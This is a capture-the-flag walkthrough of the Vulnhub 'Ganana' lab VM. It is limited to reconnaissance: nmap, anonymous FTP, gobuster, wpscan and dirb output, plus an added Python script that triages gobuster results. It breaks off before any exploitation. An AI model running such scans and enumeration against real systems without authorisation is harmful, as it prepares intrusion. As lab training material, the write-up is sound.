Vulnhub Ganana Walkthrough

Ganana

Identifying the target host IP address


┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:86:52:7b      1      60  PCS Systemtechnik GmbH
 192.168.56.163  08:00:27:03:83:d3      1      60  PCS Systemtechnik GmbH

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.163.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.163 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 03:28 EST
Nmap scan report for 192.168.56.163
Host is up (0.00034s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE  VERSION
22/tcp   closed ssh
80/tcp   open   http     Apache httpd (PHP 7.3.17)
|_http-server-header: Apache
|_http-generator: WordPress 5.4.2
|_http-title: Ganana
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
443/tcp  open   ssl/http Apache httpd (PHP 7.3.17)
| ssl-cert: Subject: commonName=www.example.com/organizationName=Bitnami
| Not valid before: 2020-06-06T10:55:45
|_Not valid after:  2030-06-04T10:55:45
|_http-server-header: Apache
|_ssl-date: TLS randomness does not represent time
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Ganana
|_http-generator: WordPress 5.4.2
6777/tcp open   ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.137
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:03:83:D3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.93 seconds

Get Access

Start by gathering and analysing information from the FTP service.

┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ ftp 192.168.56.163 -P 6777
Connected to 192.168.56.163.
220 (vsFTPd 3.0.3)
Name (192.168.56.163:kali): ftp
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||25711|)

└─$ curl http://192.168.56.163/robots.txt                   
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

Port 443 returns the same content as port 80.

┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ gobuster dir -u http://192.168.56.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.163
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/08 03:49:34 Starting gobuster in directory enumeration mode
===============================================================
/rss                  (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/]
/register             (Status: 302) [Size: 0] [--> http://192.168.56.163/secret/?registration=disabled]
/0                    (Status: 301) [Size: 0] [--> http://192.168.56.163/0/]
/feed                 (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/]
/atom                 (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/atom/]
/wp-content           (Status: 301) [Size: 241] [--> http://192.168.56.163/wp-content/]
/rss2                 (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/]
/license              (Status: 200) [Size: 19915]
/wp-includes          (Status: 301) [Size: 242] [--> http://192.168.56.163/wp-includes/]
/logout               (Status: 403) [Size: 2795]
/rdf                  (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/rdf/]
/page1                (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/readme               (Status: 200) [Size: 7274]
/'                    (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/lostpassword         (Status: 200) [Size: 10861]
/dashboard            (Status: 302) [Size: 0] [--> http://192.168.56.163/secret/?redirect_to=%2Fdashboard]
/%20                  (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/secret               (Status: 302) [Size: 0] [--> http://192.168.56.163/secret/]
/wp-admin             (Status: 301) [Size: 239] [--> http://192.168.56.163/wp-admin/]
/phpmyadmin           (Status: 301) [Size: 241] [--> http://192.168.56.163/phpmyadmin/]
/0000                 (Status: 301) [Size: 0] [--> http://192.168.56.163/0000/]
/tasks                (Status: 200) [Size: 156]
/embed                (Status: 301) [Size: 0] [--> http://192.168.56.163/embed/]
/xmlrpc               (Status: 405) [Size: 42]
/resetpass            (Status: 302) [Size: 0] [--> http://192.168.56.163/lostpassword/?error=invalidkey]
/Oasis - 'Definitely Maybe' (Status: 301) [Size: 0] [--> http://192.168.56.163/Oasis%20-%20%27Definitely%20Maybe]
/wp-signup            (Status: 500) [Size: 2686]
/!                    (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/yahoo!               (Status: 301) [Size: 0] [--> http://192.168.56.163/yahoo]
/Check Screenshots!   (Status: 301) [Size: 0] [--> http://192.168.56.163/Check%20Screenshots]
/Check All Tracker Features! (Status: 301) [Size: 0] [--> http://192.168.56.163/Check%20All%20Tracker%20Features]
/Bling!               (Status: 301) [Size: 0] [--> http://192.168.56.163/Bling]
/Welcome!             (Status: 301) [Size: 0] [--> http://192.168.56.163/Welcome]
/b00g!                (Status: 301) [Size: 0] [--> http://192.168.56.163/b00g]
/party!               (Status: 301) [Size: 0] [--> http://192.168.56.163/party]
/leeches!             (Status: 301) [Size: 0] [--> http://192.168.56.163/leeches]
/Mac Fishin!!!        (Status: 301) [Size: 0] [--> http://192.168.56.163/Mac%20Fishin]
/i deep throat in a thong! (Status: 301) [Size: 0] [--> http://192.168.56.163/i%20deep%20throat%20in%20a%20thong]
/new!                 (Status: 301) [Size: 0] [--> http://192.168.56.163/new]
/KeithRankin%20       (Status: 301) [Size: 0] [--> http://192.168.56.163/KeithRankin]
/Naked Gymnastics - This Is How It Should Always Be! (Status: 301) [Size: 0] [--> http://192.168.56.163/Naked%20Gymnastics%20-%20This%20Is%20How%20It%20Should%20Always%20Be]
/nada!                (Status: 301) [Size: 0] [--> http://192.168.56.163/nada]
/Q Are We Not Men A We Are Devo! (Status: 301) [Size: 0] [--> http://192.168.56.163/Q%20Are%20We%20Not%20Men%20A%20We%20Are%20Devo]
/!index!              (Status: 301) [Size: 0] [--> http://192.168.56.163/!index]
/35-GeoCool!          (Status: 301) [Size: 0] [--> http://192.168.56.163/35-GeoCool]
/kaspersky%20         (Status: 301) [Size: 0] [--> http://192.168.56.163/kaspersky]
/Ping%21              (Status: 301) [Size: 0] [--> http://192.168.56.163/Ping]
/Ajax_%28programming%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Ajax_%28programming]
/page01               (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/Clinton%20Sparks%20%26%20Diddy%20-%20Dont%20Call%20It%20A%20Comeback%28RuZtY%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Clinton%20Sparks%20%26%20Diddy%20-%20Dont%20Call%20It%20A%20Comeback%28RuZtY]
/Yahoo%21             (Status: 301) [Size: 0] [--> http://192.168.56.163/Yahoo]
/Go!                  (Status: 301) [Size: 0] [--> http://192.168.56.163/Go]
/Sevendust%20-%20Animosity%20%282001%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Sevendust%20-%20Animosity%20%282001]
/David%20Wright%20-%20Deeper%20%28New%20Age%2C%202005%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/David%20Wright%20-%20Deeper%20%28New%20Age%2C%202005]
/Cirque%20du%20soleil%20 (Status: 301) [Size: 0] [--> http://192.168.56.163/Cirque%20du%20soleil]
/Rameses%20II%20-%20Wrath%20of%20God%20or%20Man%20%28Discovery%20Channel%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Rameses%20II%20-%20Wrath%20of%20God%20or%20Man%20%28Discovery%20Channel]
/Windows%20Longhorn%20Server%20Core%20Lite%20%28December%202006%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Windows%20Longhorn%20Server%20Core%20Lite%20%28December%202006]
/%22james%20kim%22    (Status: 301) [Size: 0] [--> http://192.168.56.163/%22james%20kim]
/%22julie%20roehm%22  (Status: 301) [Size: 0] [--> http://192.168.56.163/%22julie%20roehm]
/%22britney%20spears%22 (Status: 301) [Size: 0] [--> http://192.168.56.163/%22britney%20spears]
Progress: 220538 / 220561 (99.99%)
===============================================================
2022/11/08 04:29:59 Finished
===============================================================
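
Most of the listing above is wordlist noise: WordPress answers junk paths with a 301 to the site root, or with a canonical redirect that merely trims a trailing "!" or "%20" from the path. As an added example (not part of the original walkthrough), this Python script triages gobuster output along those lines and leaves the distinct endpoints worth a manual look; the base URL is the scan's, and the sample lines are a constructed subset of the listing above.

```python
"""Triage gobuster 'dir' output for a WordPress site.

Added example, not part of the original walkthrough. Entries that only
redirect to the site root, or to a trimmed spelling of themselves, are
separated from the endpoints that deserve a manual look.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# One gobuster result line, e.g.
# /register  (Status: 302) [Size: 0] [--> http://192.168.56.163/secret/?registration=disabled]
LINE_RE = re.compile(
    r"^(?P<path>/.*?)\s+\(Status: (?P<status>\d{3})\)\s+\[Size: (?P<size>\d+)\]"
    r"(?:\s+\[--> (?P<target>\S+)\])?$"
)

# Constructed subset of the scan above (same host, same line format).
SAMPLE = """\
/rss                  (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/]
/register             (Status: 302) [Size: 0] [--> http://192.168.56.163/secret/?registration=disabled]
/license              (Status: 200) [Size: 19915]
/logout               (Status: 403) [Size: 2795]
/page1                (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/'                    (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/lostpassword         (Status: 200) [Size: 10861]
/secret               (Status: 302) [Size: 0] [--> http://192.168.56.163/secret/]
/phpmyadmin           (Status: 301) [Size: 241] [--> http://192.168.56.163/phpmyadmin/]
/tasks                (Status: 200) [Size: 156]
/xmlrpc               (Status: 405) [Size: 42]
/yahoo!               (Status: 301) [Size: 0] [--> http://192.168.56.163/yahoo]
/KeithRankin%20       (Status: 301) [Size: 0] [--> http://192.168.56.163/KeithRankin]
Progress: 220538 / 220561 (99.99%)===============================================================
"""


def triage(text, base="http://192.168.56.163"):
    """Split gobuster output into (endpoints, noise).

    endpoints: list of (path, status, size, redirect_path_or_None), in scan order
    noise:     dict mapping a reason to the paths discarded for that reason
    """
    endpoints = []
    noise = defaultdict(list)
    for raw in text.splitlines():
        m = LINE_RE.match(raw.rstrip())
        if not m:
            continue  # banner, separator or progress line
        path, status, size = m["path"], int(m["status"]), int(m["size"])
        target = m["target"]
        # Reduce an absolute redirect target to its path component.
        tpath = target[len(base):] if target and target.startswith(base) else target
        # Compare decoded forms so "/KeithRankin%20" and "/KeithRankin" line up;
        # the reported path stays exactly as gobuster printed it.
        dpath, dtpath = unquote(path), unquote(tpath) if tpath else None
        if tpath == "/":
            noise["redirect to site root"].append(path)
        elif dtpath and dtpath != dpath + "/" and dpath.startswith(dtpath):
            noise["canonical redirect to a trimmed spelling of itself"].append(path)
        else:
            endpoints.append((path, status, size, tpath))
    return endpoints, dict(noise)


def report(text, base="http://192.168.56.163"):
    """Render a short human-readable summary as a list of lines."""
    endpoints, noise = triage(text, base)
    lines = ["Endpoints worth a look:"]
    for path, status, size, tpath in endpoints:
        dest = f" -> {tpath}" if tpath else ""
        lines.append(f"  {status} {path}{dest} ({size} bytes)")
    for reason, paths in noise.items():
        lines.append(f"Dropped {len(paths)} entries: {reason}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE)))
```

Feed it the saved gobuster output of a real run (for example via `report(open("gobuster.txt").read())`) to get the same split on the full listing.
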
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ wpscan --url http://192.168.56.163 -e u,p                                      
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.163/ [192.168.56.163]
[+] Started: Tue Nov  8 04:37:59 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Powered-By: PHP/7.3.17
 |  - X-Mod-Pagespeed: 1.13.35.2-0
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.163/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.163/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.163/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.163/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.163/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://192.168.56.163/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: tsumugi
 | Location: http://192.168.56.163/wp-content/themes/tsumugi/
 | Latest Version: 2.2.1 (up to date)
 | Last Updated: 2019-05-05T00:00:00.000Z
 | Readme: http://192.168.56.163/wp-content/themes/tsumugi/readme.txt
 | Style URL: http://192.168.56.163/wp-content/themes/tsumugi/style.css?ver=2.2.1
 | Style Name: tsumugi
 | Style URI: http://littlebirdjp.github.io/tsumugi/
 | Description: tsumugi is a simple blog theme based on _s and Bootstrap. It consists of a single column layout whic...
 | Author: youthkee
 | Author URI: http://littlebird.mobi/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 2.2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.163/wp-content/themes/tsumugi/style.css?ver=2.2.1, Match: 'Version: 2.2.1'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] stop-user-enumeration
 | Location: http://192.168.56.163/wp-content/plugins/stop-user-enumeration/
 | Last Updated: 2022-08-12T18:59:00.000Z
 | [!] The version is out of date, the latest version is 1.4.5
 |
 | Found By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.3.25 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://192.168.56.163/wp-content/plugins/stop-user-enumeration/frontend/js/frontend.js?ver=1.3.25
 | Confirmed By:
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.56.163/wp-content/plugins/stop-user-enumeration/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.56.163/wp-content/plugins/stop-user-enumeration/readme.txt

[+] theme-my-login
 | Location: http://192.168.56.163/wp-content/plugins/theme-my-login/
 | Last Updated: 2022-06-10T20:31:00.000Z
 | [!] The version is out of date, the latest version is 7.1.5
 |
 | Found By: Urls In 404 Page (Passive Detection)
 |
 | Version: 7.1 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://192.168.56.163/wp-content/plugins/theme-my-login/assets/styles/theme-my-login.min.css?ver=7.1
 | Confirmed By:
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.56.163/wp-content/plugins/theme-my-login/readme.txt
 |  Translation File (Aggressive Detection)
 |   - http://192.168.56.163/wp-content/plugins/theme-my-login/languages/theme-my-login.pot, Match: '"Project-Id-Version: Theme My Login 7.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov  8 04:38:02 2022
[+] Requests Done: 53
[+] Cached Requests: 9
[+] Data Sent: 13.562 KB
[+] Data Received: 156.932 KB
[+] Memory used: 234.977 MB
[+] Elapsed time: 00:00:03

Gobuster turned up a /lostpassword directory, but using it requires knowing a username first.

┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ dirb http://192.168.56.163

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Nov  8 04:41:20 2022
URL_BASE: http://192.168.56.163/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.163/ ----
==> DIRECTORY: http://192.168.56.163/0/                                                                                                                                                                                                    
+ http://192.168.56.163/atom (CODE:301|SIZE:0)                                                                                                                                                                                             
+ http://192.168.56.163/dashboard (CODE:302|SIZE:0)                                                                                                                                                                                        
==> DIRECTORY: http://192.168.56.163/embed/                                                                                                                                                                                                
+ http://192.168.56.163/favicon.ico (CODE:302|SIZE:0)                                                                                                                                                                                      
==> DIRECTORY: http://192.168.56.163/feed/                                                                                                                                                                                                 
+ http://192.168.56.163/index.php (CODE:301|SIZE:0)                                                                                                                                                                                        
+ http://192.168.56.163/license (CODE:200|SIZE:19915)                                                                                                                                                                                      
+ http://192.168.56.163/logout (CODE:403|SIZE:2795)                                                                                                                                                                                        
+ http://192.168.56.163/lostpassword (CODE:200|SIZE:10889)                                                                                                                                                                                 
+ http://192.168.56.163/page1 (CODE:301|SIZE:0)                                                                                                                                                                                            
==> DIRECTORY: http://192.168.56.163/phpmyadmin/                                                                                                                                                                                           
+ http://192.168.56.163/rdf (CODE:301|SIZE:0)                                                                                                                                                                                              
+ http://192.168.56.163/readme (CODE:200|SIZE:7274)                                                                                                                                                                                        
+ http://192.168.56.163/register (CODE:302|SIZE:0)                                                                                                                                                                                         
+ http://192.168.56.163/robots.txt (CODE:200|SIZE:67)                                                                                                                                                                                      
+ http://192.168.56.163/rss (CODE:301|SIZE:0)                                                                                                                                                                                              
+ http://192.168.56.163/rss2 (CODE:301|SIZE:0)                                                                                                                                                                                             
==> DIRECTORY: http://192.168.56.163/secret/                                                                                                                                                                                               
+ http://192.168.56.163/tasks (CODE:200|SIZE:156)                                                                                                                                                                                          
==> DIRECTORY: http://192.168.56.163/wp-admin/                                                                                                                                                                                             
+ http://192.168.56.163/wp-config (CODE:200|SIZE:0)                                                                                                                                                                                        
==> DIRECTORY: http://192.168.56.163/wp-content/                                                                                                                                                                                           
+ http://192.168.56.163/wp-cron (CODE:200|SIZE:0)                                                                                                                                                                                          
==> DIRECTORY: http://192.168.56.163/wp-includes/                                                                                                                                                                                          
+ http://192.168.56.163/wp-links-opml (CODE:200|SIZE:221)                                                                                                                                                                                  
+ http://192.168.56.163/wp-load (CODE:200|SIZE:0)                                                                                                                                                                                          
+ http://192.168.56.163/wp-mail (CODE:403|SIZE:2709)                                                                                                                                                                                       
+ http://192.168.56.163/wp-settings (CODE:500|SIZE:0)                                                                                                                                                                                      
+ http://192.168.56.163/xmlrpc (CODE:405|SIZE:42)                                                                                                                                                                                          
+ http://192.168.56.163/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                                                                                      
                                                                                                                                                                                                                                           
---- Entering directory: http://192.168.56.163/0/ ----
+ http://192.168.56.163/0/atom (CODE:301|SIZE:0)                                                                                                                                                                                           
==> DIRECTORY: http://192.168.56.163/0/feed/                                                                                                                                                                                               
+ http://192.168.56.163/0/index.php (CODE:301|SIZE:0)                                                                                                                                                                                      
+ http://192.168.56.163/0/rdf (CODE:301|SIZE:0)                                                                                                                                                                                            
+ http://192.168.56.163/0/rss (CODE:301|SIZE:0)                                                                                                                                                                                            
+ http://192.168.56.163/0/rss2 (CODE:301|SIZE:0)                                                                                                                                                                                           
                                                                                                                                                                                                                                           
---- Entering directory: http://192.168.56.163/embed/ ----
+ http://192.168.56.163/embed/atom (CODE:301|SIZE:0)                                                                                                                                                                                       
==> DIRECTORY: http://192.168.56.163/embed/feed/                                                                                                                                                                                           
+ http://192.168.56.163/embed/index.php (CODE:301|SIZE:0)                                                                                                                                                                                  
+ http://192.168.56.163/embed/rdf (CODE:301|SIZE:0)                                                                                                                                                                                        
+ http://192.168.56.163/embed/rss (CODE:301|SIZE:0)                                                                                                                                                                                        
+ http://192.168.56.163/embed/rss2 (CODE:301|SIZE:0)                                                                                                                                                                                       
                                                                                                                                                                                                                                           
---- Entering directory: http://192.168.56.163/feed/ ----
==> DIRECTORY: http://192.168.56.163/feed/atom/                                                                                                                                                                                            
+ http://192.168.56.163/feed/feed (CODE:301|SIZE:0)                                                                                                                                                                                        
+ http://192.168.56.163/feed/index.php (CODE:301|SIZE:0)                                                                                                                                                                                   
==> DIRECTORY: http://192.168.56.163/feed/rdf/                                                                                                                                                                                             
+ http://192.168.56.163/feed/rss (CODE:301|SIZE:0)                                                                                                                                                                                         
+ http://192.168.56.163/feed/rss2 (CODE:301|SIZE:0)                                                                                                                                                                                        
                                                                                                                                                                                                                                           
---- Entering directory: http://192.168.56.163/phpmyadmin/ ----
+ http://192.168.56.163/phpmyadmin/ChangeLog (CODE:200|SIZE:27390)                                                                                                                                                                         
==> DIRECTORY: http://192.168.56.163/phpmyadmin/doc/                                                                                                                                                                                       
==> DIRECTORY: http://192.168.56.163/phpmyadmin/examples/                                                                                                                                                                                  
+ http://192.168.56.163/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)                                                                                                                                                                       
+ http://192.168.56.163/phpmyadmin/index.php (CODE:200|SIZE:15104)                                                                                                                                                                         
==> DIRECTORY: http://192.168.56.163/phpmyadmin/js/                                                                                                                                                                                        
==> DIRECTORY: http://192.168.56.163/phpmyadmin/libraries/                                                                                                                                                                                 
+ http://192.168.56.163/phpmyadmin/LICENSE (CODE:200|SIZE:18092)                                                                                                                                                                           
==> DIRECTORY: http://192.168.56.163/phpmyadmin/locale/                                                                                                                                                                                    
+ http://192.168.56.163/phpmyadmin/phpinfo.php (CODE:200|SIZE:15106)                                                                                                                                                                       
+ http://192.168.56.163/phpmyadmin/README (CODE:200|SIZE:1520)                                                                                                                                                                             
+ http://192.168.56.163/phpmyadmin/robots.txt (CODE:200|SIZE:26)                                                                                                                                                                           
==> DIRECTORY: http://192.168.56.163/phpmyadmin/setup/                                                                                                                                                                                     
==> DIRECTORY: http://192.168.56.163/phpmyadmin/sql/                                                                                                                                                                                       
==> DIRECTORY: http://192.168.56.163/phpmyadmin/templates/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.56.163/phpmyadmin/themes/                                                                                                                                                                                    
==> DIRECTORY: http://192.168.56.163/phpmyadmin/tmp/                                                                                                                                                                                       
==> DIRECTORY: http://192.168.56.163/phpmyadmin/vendor/                                                                                                                                                                                    
                                                                                                                                                                                                                                           
---- Entering directory: http://192.168.56.163/secret/ ----
+ http://192.168.56.163/secret/atom (CODE:301|SIZE:0)                                                                                                                                                                                      
==> DIRECTORY: http://192.168.56.163/secret/feed/                                                                                                                                                                                          
+ http://192.168.56.163/secret/index.php (CODE:301|SIZE:0)                                                                                                                                                                                 
+ http://192.168.56.163/secret/rdf (CODE:301|SIZE:0)                                                                                                                                                                                       
+ http://192.168.56.163/secret/rss (CODE:301|SIZE:0)                                                                                                                                                                                       
+ http://192.168.56.163/secret/rss2 (CODE:301|SIZE:0)                                                                                                                                                                                      
                                                                                                                                                                                                                                           
---- Entering directory: http://192.168.56.163/wp-admin/ ----
+ http://192.168.56.163/wp-admin/about (CODE:302|SIZE:0)                                                                                                                                                                                   
+ http://192.168.56.163/wp-admin/admin (CODE:302|SIZE:0)                                                                                                                                                                                   
+ http://192.168.56.163/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                                                               
+ http://192.168.56.163/wp-admin/atom (CODE:301|SIZE:0)                                                                                                                                                                                    
+ http://192.168.56.163/wp-admin/comment (CODE:302|SIZE:0)                                                                                                                                                                                 
+ http://192.168.56.163/wp-admin/credits (CODE:302|SIZE:0)                                                                                                                                                                                 
==> DIRECTORY: http://192.168.56.163/wp-admin/css/                                                                                                                                                                                         
+ http://192.168.56.163/wp-admin/customize (CODE:403|SIZE:2680)                                                                                                                                                                            
+ http://192.168.56.163/wp-admin/edit (CODE:302|SIZE:0)                                                                                                                                                                                    
+ http://192.168.56.163/wp-admin/export (CODE:302|SIZE:0)                                                                                                                                                                                  
==> DIRECTORY: http://192.168.56.163/wp-admin/feed/                                                                                                                                                                                        
==> DIRECTORY: http://192.168.56.163/wp-admin/images/                                                                                                                                                                                      
+ http://192.168.56.163/wp-admin/import (CODE:302|SIZE:0)                                                                                                                                                                                  
==> DIRECTORY: http://192.168.56.163/wp-admin/includes/                                                                                                                                                                                    
+ http://192.168.56.163/wp-admin/index (CODE:302|SIZE:0)                                                                                                                                                                                   
+ http://192.168.56.163/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                                                               
==> DIRECTORY: http://192.168.56.163/wp-admin/js/                                                                                                                                                                                          
+ http://192.168.56.163/wp-admin/link (CODE:302|SIZE:0)                                                                                                                                                                                    
==> DIRECTORY: http://192.168.56.163/wp-admin/maint/                                                                                                                                                                                       
+ http://192.168.56.163/wp-admin/media (CODE:302|SIZE:0)                                                                                                                                                                                   
+ http://192.168.56.163/wp-admin/menu (CODE:500|SIZE:0)                                                                                                                                                                                    
+ http://192.168.56.163/wp-admin/moderation (CODE:302|SIZE:0)                                                                                                                                                                              
==> DIRECTORY: http://192.168.56.163/wp-admin/network/                                                                                                                                                                                     
+ http://192.168.56.163/wp-admin/options (CODE:302|SIZE:0)                                                                                                                                                                                 
+ http://192.168.56.163/wp-admin/plugins (CODE:302|SIZE:0)                                                                                                                                                                                 
+ http://192.168.56.163/wp-admin/post (CODE:302|SIZE:0)                                                                                                                                                                                    
+ http://192.168.56.163/wp-admin/privacy (CODE:302|SIZE:0)                                                                                                                                                                                 
+ http://192.168.56.163/wp-admin/profile (CODE:302|SIZE:0)                                                                                                                                                                                 
+ http://192.168.56.163/wp-admin/rdf (CODE:301|SIZE:0)                                                                                                                                                                                     
+ http://192.168.56.163/wp-admin/rss (CODE:301|SIZE:0)                                                                                                                                                                                     
+ http://192.168.56.163/wp-admin/rss2 (CODE:301|SIZE:0)                                                                                                                                                                                    
+ http://192.168.56.163/wp-admin/term (CODE:302|SIZE:0)                                                                                                                                                                                    
+ http://192.168.56.163/wp-admin/themes (CODE:302|SIZE:0)                                                                                                                                                                                  
+ http://192.168.56.163/wp-admin/tools (CODE:302|SIZE:0)                                                                                                                                                                                   
+ http://192.168.56.163/wp-admin/update (CODE:302|SIZE:0)                                                                                                                                                                                  
+ http://192.168.56.163/wp-admin/upgrade (CODE:200|SIZE:1456)                                                                                                                                                                              
+ http://192.168.56.163/wp-admin/upload (CODE:302|SIZE:0)                                                                                                                                                                                  
==> DIRECTORY: http://192.168.56.163/wp-admin/user/                                                                                                                                                                                        
+ http://192.168.56.163/wp-admin/users (CODE:302|SIZE:0)                                                                                                                                                                                   
+ http://192.168.56.163/wp-admin/widgets (CODE:302|SIZE:0)                                                                                                                                                                                 
                                                                                                                                                                                                                                           
---- Entering directory: http://192.168.56.163/wp-content/ ----
+ http://192.168.56.163/wp-content/atom (CODE:301|SIZE:0)                                                                                                                                                                                  
==> DIRECTORY: http://192.168.56.163/wp-content/feed/                                                                                                                                                                                      
+ http://192.168.56.163/wp-content/index (CODE:200|SIZE:0)                                                                                                                                                                                 
+ http://192.168.56.163/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                                                             
==> DIRECTORY: http://192.168.56.163/wp-content/languages/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.56.163/wp-content/plugins/                                                                                                                                                                                   
+ http://192.168.56.163/wp-content/rdf (CODE:301|SIZE:0)                                                                                                                                                                                   
+ http://192.168.56.163/wp-content/rss (CODE:301|SIZE:0)                                                                                                                                                                                   
+ http://192.168.56.163/wp-content/rss2 (CODE:301|SIZE:0)                                                                                                                                                                                  
==> DIRECTORY: http://192.168.56.163/wp-content/themes/                                                                                                                                                                                    
